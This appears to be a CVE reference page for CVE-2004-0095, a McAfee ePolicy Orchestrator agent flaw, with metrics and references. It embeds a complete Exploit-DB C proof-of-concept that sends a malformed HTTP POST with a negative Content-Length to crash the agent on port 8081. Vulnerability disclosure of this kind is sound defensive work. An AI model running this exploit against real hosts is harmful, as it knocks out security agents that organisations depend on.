CVE-2004-0095 : Detail

CVE-2004-0095

1.78%V3
Network
2004-09-01
02h00 +00:00
2007-11-12
23h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

McAfee ePolicy Orchestrator agent allows remote attackers to cause a denial of service (memory consumption and crash) and possibly execute arbitrary code via an HTTP POST request with an invalid Content-Length value, possibly triggering a buffer overflow.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 23584

Publication date : 2004-01-21 23h00 +00:00
Author : cyber_flash
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/9476/info The McAfee ePolicy Orchestrator agent has been reported to a buffer management vulnerability that may be exploited to crash the affected agent. Although unconfirmed, it has been reported that the issue may also allow a remote attacker to trigger a buffer overflow vulnerability. The issue reportedly presents itself, because certain values in HTTP POST headers processed by the ePolicy Orchestrator are not sufficiently sanitized. /* >McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability PoC >Ref : http://securityfocus.com/bid/9476 >discovered by : [email protected] " The McAfee ePolicy Orchestrator agent has been reported to a buffer management vulnerability that may be exploited to crash the affected agent. Although unconfirmed, it has been reported that the issue may also allow a remote attacker to trigger a buffer overflow vulnerability. The issue reportedly presents itself, because certain values in HTTP POST headers processed by the ePolicy Orchestrator are not sufficiently sanitized. " >Hi NA-eye ;-) . Hurry-yup . relase a patch guyz ! + PoC by Shashank Pandey a.k.a G0D_0F_z10N + > Greetz to my dewd 'Arun Jose' for 'Grass is not addictive..thing' while i wuz writing this..! > lame coding ..dont think too much abt it... */ #include <windows.h> #include <winsock.h> #include <stdio.h> #pragma comment (lib,"ws2_32") int main(int argc, char *argv[]) { WSADATA wsaData; int s; struct hostent *yo; struct sockaddr_in wutever; char badb0y[] = "POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0\r\n" "Accept: application/octet-stream\r\n" "Accept-Language: en-us\r\n" "Content-Type: application/octet-stream\r\n" "User-Agent: Godzilla/6.9 (compatible; SPIPE/3.0; Windows)\r\n" "Host: EPO_DIE\r\n" "Content-Length: -1\r\n" "Connection: Keep-Alive\r\n\r\n"; printf("\n--------------------------------- "); printf("\n McAfee ePO agent overflow PoC \n"); printf("+++++++++++++++++++++++++++++++++\n"); printf(" by Shashank Pandey \n"); printf(" ([email protected]) \n"); printf("--------------------------------- \n"); if(WSAStartup(0x0101,&wsaData)!=0) { printf("Error :Cudn't initiate winsock!"); return 0; } if(argc<2) {printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]); exit(0);} if ( (yo = gethostbyname(argv[1]))==0) { printf("error: can't resolve '%s'",argv[1]); return 1; } wutever.sin_port = htons(8081); // ePO agent uses the HTTP protocol to communicate on port 8081 wutever.sin_family = AF_INET; wutever.sin_addr = *((struct in_addr *)yo->h_addr); if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("error: can't create socket"); return 1; } if ((connect(s, (struct sockaddr *) &wutever, sizeof(wutever))) == -1){ printf("Error:Cudn't Connect\r\n"); return 1; } printf("\r\nCrashing the client...< it's a PoC dewd ;-) >\n"); send(s,badb0y,strlen(badb0y),0); closesocket(s); WSACleanup(); return 1; }

Products Mentioned

Configuraton 0

Mcafee>>Epolicy_orchestrator >> Version 3.6.0

References

http://www.securityfocus.com/bid/9476
Tags : vdb-entry, x_refsource_BID
http://www.osvdb.org/3744
Tags : vdb-entry, x_refsource_OSVDB